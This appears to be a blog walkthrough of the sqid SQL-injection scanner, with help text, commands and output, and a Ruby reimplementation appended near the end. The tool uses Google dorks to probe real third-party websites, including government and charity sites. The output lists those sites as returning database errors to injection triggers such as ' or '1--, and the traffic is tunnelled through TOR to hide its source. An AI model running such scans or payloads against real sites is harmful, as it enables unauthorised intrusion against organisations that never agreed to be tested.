It can perform the following operations:
- Look for SQL injection in a web page by checking the links it contains.
- Submit the forms on a web page to look for SQL injection.
- Crawl a website and perform the operations listed above on every page found.
- Perform a Google search for a query and check the URLs returned for SQL injection.
Let's see it in action
Running sqid with the help (-h) argument:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -h
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
Usage: sqid.rb [options]
options:
-m, --mode MODE Operate in mode MODE.
MODE is one of
g,google Operate in google search mode.
u,url Check this url or a file with urls.
p,page Check single page.
c,crawl Crawl website and check.
Google search mode options:
-q, --query QUERY QUERY to perforn google search for.
-s, --start START zero-based index of the first desired result,
zero if not specified.
-r, --results RESULTS number of results desired, default is 20 if not specfied.
rounded to tens.
URL check mode options:
-u, --url URL check this URL.
If URL is a file urls will be loaded from this file, specify each url on a new line.
Page check mode options:
-p, --page PAGE Check this page.
Crawl mode options:
-c, --crawl WEBSITE Crawl website WEBSITE and check.
specify as http[s]://WESITE:[PORT], default PORT is 80
URL, Page and Crawl mode common options:
-C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value.
If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line.
-a, --accept-cookies Accept cookies from the webite or page. Default is no.
-R, --referer REFERER Set referer in the HTTP header.
-B, --auth CREDENTIALS Use credentials as basic auth for the website.
specify as user:password.
Common options:
-o, --with-noquery Match page content without query parameters. Default is false.
-D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database.
-t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '.
If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline.
Lines starting with a # are ignored.
-T, --time-out TIMEOUT Timeout for response in seconds.
Default is 10 seconds.
-U, --user-agent USERAGENT User Agent in the HTTP Header. Default is SQID/0.3.
-P, --proxy PROXY User HTTP proxy PROXY for operations.
specfify as proxy:port.
-A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy.
specfify as user:password.
-v, --verbose Run verbosely.
-h, --help Show this message
Let's play with the google query:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -m g -q inurl:page.asp -s 0 -r 50
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[+] Getting 50 links from search inurl:page.asp starting from 0.
[+] Done got 50 links.
[*] Going to check 50 urls.
500 VBScript / ASP error => http://www.ddcf.org/page.asp?pageId='
500 MS-SQL Server error => http://www.unctad.org/Templates/Page.asp?intItemID='
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID='&DID=3079
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID=72&DID='
500 VBScript / ASP error => http://www.airweb.org/page.asp?page='
500 VBScript runtime error => http://www.airweb.org/page.asp?page='
Timed out => http://www.pebblebeach.com/page.asp?id='
500 VBScript / ASP error => http://www.royalsoc.ac.uk/page.asp?id='
500 VBScript runtime error => http://www.royalsoc.ac.uk/page.asp?id='
500 ADODB Error => http://www.yased.org.tr/page.asp?pageid='
500 VBScript / ASP error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript runtime error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript / ASP error => http://www.browsealoud.com/page.asp?pg_id='
500 VBScript runtime error => http://www.browsealoud.com/page.asp?pg_id='
[*] Warning: Client error 404 Page not found, http://policyresearch.gc.ca/page.asp?pagenm='.
500 VBScript runtime error => http://philanthropy.moodys.com/page.asp?template='&context=cmr&section=hglts
500 No match => http://philanthropy.moodys.com/page.asp?template=cmr&context='&section=hglts
Error getaddrinfo: No address associated with nodename, http://www.airindiaexpress.co.in/page.asp?pageid='.
500 VBScript runtime error => http://www.bscs.org/page.asp?pageid='&id=0%7Cevolution_programs
500 VBScript / ASP error => http://www.televue.com/engine/page.asp?cat='
500 VBScript runtime error => http://www.televue.com/engine/page.asp?cat='
500 MS-Access error => http://www.northernirelandscreen.co.uk/page.asp?id='
500 No match => http://www.airindia.com/page.asp?pageid='
500 MS-SQL Server error => http://www.seaair.info/page.asp?page='
[*] Checked 44 URLs.
A closer look at the query: sqid.rb -m g -q inurl:page.asp -s 0 -r 50
-q the search query, here "inurl:page.asp"
-s start with result 0 (the first result)
-r return 50 results
You can use sqid to check a URL:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -m u -u http://www.site.info/page.asp?page=
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[*] Going to check 1 urls.
500 MS-SQL Server error => http://www.site.info/page.asp?page='
[*] Checked 1 URLs.
You can use sqid to check a page:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -m p -p http://www.site.info/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[+] Getting links from page http://www.site.info/.
[*] Invalid URL: bad URI(is not URI?): %20http://www.site.org.za
[+] Done got 2 links.
[*] Going to check 2 urls.
500 MS-SQL Server error => http://www.site.info/page.asp?page='
[*] Checked 2 URLs.
You can use sqid to crawl a site as well:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Getting http://www.carnal0wnage.com/research.html.
[v] Getting http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Getting http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Getting http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Getting http://www.carnal0wnage.com/about.html.
[v] Getting http://www.carnal0wnage.com/links.html.
[v] Getting http://www.carnal0wnage.com//pvt/phackvideos.html.
[*] Warning: Client error 401 Authorization Required, http://www.carnal0wnage.com//pvt/phackvideos.html.
[+] Done got 32 links.
[*] Going to check 32 urls.
[v] Checking URL http://www.carnal0wnage.com/main.html.
[v] Checking URL http://www.carnal0wnage.com/papers.html.
[v] Checking URL http://www.carnal0wnage.com/hackvideos/index.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T2_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/research.html.
[v] Checking URL http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Checking URL http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Checking URL http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Checking URL http://www.carnal0wnage.com/about.html.
[v] Checking URL http://www.carnal0wnage.com/links.html.
[v] Checking URL http://www.carnal0wnage.com//pvt/phackvideos.html.
[*] Checked 32 URLs.
Tunnel that stuff through TOR:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -P localhost:8118 -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
---snip---
By default, sqid only checks for SQL injection with a single quote ( ' ) as the trigger; you can supply your own trigger file if you want more.
Adding a trigger file:
SegFault:~/sqid/sqid cg$ cat trigger2
'
' or '1
' or ' 1
' or '1--
' or ' 1--
SegFault:~/sqid/sqid cg$ ruby sqid.rb -P localhost:8118 -m g -q inurl:login.asp -t trigger2
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[+] Getting 20 links from search inurl:login.asp starting from 0.
[+] Done got 20 links.
[*] Going to check 20 urls.
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20
----snip
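To make the URL check and the trigger-file behaviour above concrete, here is a small Ruby reimplementation of the two steps sqid performs (an added example, not sqid's own code): build one test URL per parameter and trigger, then match the body of an HTTP 500 response against an error-signature table. The function names test_urls and classify, the signature regexes and the sample responses are my own constructions; sqid.db's 21 real signatures are not on this page.

```ruby
# Category name => regexp over the response body. Constructed sample
# signatures keyed by the category names sqid prints; not sqid.db itself.
SIGNATURES = {
  'MS-SQL Server error'    => /Microsoft OLE DB Provider for SQL Server|\[SQL Server\]/i,
  'VBScript runtime error' => /Microsoft VBScript runtime/i,
  'VBScript / ASP error'   => /Microsoft VBScript compilation|ASP 0\d{3}/i,
  'MS-Access error'        => /Microsoft JET Database Engine/i,
  'ADODB Error'            => /ADODB\.(Recordset|Command|Field)/i,
}.freeze

# Encode a trigger the way the output above shows it: spaces become %20,
# while ' and - are left alone (an assumption about sqid's encoding).
def encode_trigger(trigger)
  trigger.gsub(/[^A-Za-z0-9'\-]/) { |c| format('%%%02X', c.ord) }
end

# One test URL per (parameter, trigger): the chosen parameter's value is
# replaced by the trigger and every other parameter is left as it was,
# e.g. CID=72&DID=3079 yields CID='&DID=3079 and CID=72&DID='.
def test_urls(url, triggers = ["'"])
  base, query = url.split('?', 2)          # plain string split; URI#query= would re-escape the quote
  return [] if query.nil? || query.empty?
  pairs = query.split('&').map { |kv| kv.split('=', 2) }   # "page=" => ["page", ""]
  pairs.each_index.flat_map do |i|
    triggers.map do |t|
      mutated = pairs.each_with_index.map do |(name, value), j|
        j == i ? "#{name}=#{encode_trigger(t)}" : "#{name}=#{value}"
      end
      "#{base}?#{mutated.join('&')}"
    end
  end
end

# Only HTTP 500 bodies are matched against the table; every category whose
# signature fires is returned, or ["No match"] as sqid prints it.
def classify(status, body)
  return [] unless status == 500
  hits = SIGNATURES.select { |_, re| body =~ re }.keys
  hits.empty? ? ['No match'] : hits
end

# Constructed sample responses, not captured from any real site.
SAMPLE_RESPONSES = {
  "http://www.site.info/page.asp?page='" =>
    [500, "Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark"],
}.freeze

if $PROGRAM_NAME == __FILE__
  test_urls('http://www.site.info/page.asp?page=').each do |u|
    status, body = SAMPLE_RESPONSES.fetch(u, [200, ''])
    classify(status, body).each { |cat| puts "#{status} #{cat} => #{u}" }
  end
end
```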
-CG